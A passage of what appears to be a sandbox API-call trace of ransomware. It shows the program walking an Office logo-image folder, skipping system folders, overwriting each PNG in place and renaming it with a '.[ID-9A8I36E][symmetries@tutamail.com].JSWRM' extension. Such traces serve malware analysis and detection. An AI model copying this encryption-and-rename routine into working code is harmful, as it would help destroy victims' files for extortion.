dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.841] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2825) returned 1 [0132.841] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.841] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb00, lpOverlapped=0x0) returned 1 [0132.843] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.843] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb00, lpOverlapped=0x0) returned 1 [0132.843] CloseHandle (hObject=0x238) returned 1 [0132.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.844] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6192e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cf, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-black_scale-100.png", cAlternateFileName="GRF89D~1.PNG")) returned 1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0132.845] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0132.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-100.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-100.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 44 [0132.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-100.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-100.png", cchWideChar=44, lpMultiByteStr=0x22d260, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 44 [0132.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.846] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1743) returned 1 [0132.846] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.846] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x6c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x6c0, lpOverlapped=0x0) returned 1 [0132.847] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.847] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x6c0, lpOverlapped=0x0) returned 1 [0132.847] CloseHandle (hObject=0x238) returned 1 [0132.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.849] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6192e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x81a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-black_scale-140.png", cAlternateFileName="GR4622~1.PNG")) returned 1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0132.849] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0132.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-140.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-140.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 44 [0132.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-140.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-140.png", cchWideChar=44, lpMultiByteStr=0x22ce70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 44 [0132.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.850] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2074) returned 1 [0132.850] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.850] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x810, lpOverlapped=0x0) returned 1 [0132.852] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.852] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x810, lpOverlapped=0x0) returned 1 [0132.852] CloseHandle (hObject=0x238) returned 1 [0132.852] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.853] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa56, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-black_scale-180.png", cAlternateFileName="GRBAC6~1.PNG")) returned 1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0132.853] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0132.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-180.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-180.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 44 [0132.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-180.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-180.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 44 [0132.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.854] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2646) returned 1 [0132.854] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.854] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa50, lpOverlapped=0x0) returned 1 [0132.856] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.856] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa50, lpOverlapped=0x0) returned 1 [0132.856] CloseHandle (hObject=0x238) returned 1 [0132.856] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.857] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6192e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-black_scale-80.png", cAlternateFileName="GR3641~1.PNG")) returned 1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0132.857] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0132.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-80.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-80.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 43 [0132.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-80.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-black_scale-80.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 43 [0132.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.858] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1475) returned 1 [0132.858] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.859] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5c0, lpOverlapped=0x0) returned 1 [0132.860] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.860] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5c0, lpOverlapped=0x0) returned 1 [0132.860] CloseHandle (hObject=0x238) returned 1 [0132.860] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.861] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19a06e8b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19a06e8b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6df, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.contrast-white_scale-100.png", cAlternateFileName="GR7AE9~1.PNG")) returned 1 [0132.861] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0132.861] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0132.861] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0132.861] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0132.862] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0132.862] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0132.862] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0132.862] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.862] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0132.862] lstrcmpiW (lpString1="GrooveLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0132.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-100.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-100.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 44 [0132.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-100.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0132.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.contrast-white_scale-100.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 44 [0132.862] WideCharToMultiByte (in: 